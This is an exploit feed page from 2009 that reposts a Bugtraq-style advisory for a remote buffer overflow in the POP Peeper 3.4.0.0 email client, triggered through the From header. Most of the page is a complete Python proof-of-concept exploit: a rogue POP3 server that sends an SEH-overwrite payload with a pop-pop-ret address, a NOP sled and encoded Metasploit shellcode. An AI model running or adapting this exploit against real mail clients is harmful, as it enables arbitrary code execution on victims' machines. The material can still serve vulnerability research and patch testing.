|
Feeds -
Exploits
|
|
Written by His0k4
|
|
Monday, 23 March 2009 22:21 |
POP Peeper 'From' Mail Header Remote Buffer Overflow Vulnerability
-\\Bugtraq ID:
34192
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 20 2009 12:00AM
-\\Updated:
Mar 23 2009 04:26PM
-\\Credit:
His0k4
-\\Vulnerable:
Mortal Universe Software Entertainment POP Peeper 3.4 0
-\\Discussion
POP Peeper is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
POP Peeper 3.4.0.0 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
An attacker may exploit this issue by enticing a victim into connecting to a malicious server.
The following exploit is available:
===============================================================
34192.py
^^^^^^^^^
#!/usr/bin/python
# [+] Bug : POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)
# [+] Author : His0k4
# [+] Greetings : All friends and muslims HacKerS (DZ)
from socket import *
import struct
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x58"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x48"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x53"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x30\x4f\x35\x4a\x36\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x50\x5a")
junk = "\x41"*1989
payload = "\x42"*352
payload += "\xEB\x10\x90\x90" #jmp+10 (tan9iza ta3 10 mitrate :p)
payload += "\x4C\x51\x01\x10" #Universal pop pop ret (Imap.dll)
payload += "\x90"*19 #Nops chriki
payload += shellcode #calculatrice ta3 100 da :p
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 110))
s.listen(1)
print "[*] Listening on [POP3] 110"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])
c.send("+OK\r\n")
c.recv(512)
c.send("+OK\r\n")
c.recv(512)
c.send("+OK\r\n")
c.recv(512)
c.send("+OK 1 100\r\n")
c.recv(512)
c.send("+OK\r\n1 root\r\n.\r\n")
c.recv(512)
c.send("+OK\r\n1 t00r\r\n.\r\n")
c.recv(512)
c.send("+OK 100 octets\r\n")
c.send("To: "+junk+"\r\n.\r\n")
c.send("From: "+payload+"\r\n.\r\n")
c.send("Subject: "+junk+"\r\n.\r\n")
c.send("Date: today\r\n.\r\n")
c.send("Content-Type: "+junk+"; charset=UTF-7\r\n.\r\n")
raw_input("[*] Payload sended!\nPress key to quit")
c.close()
s.close()
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware
of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--POP Peeper Homepage
http://www.poppeeper.com (POP Peeper)
|
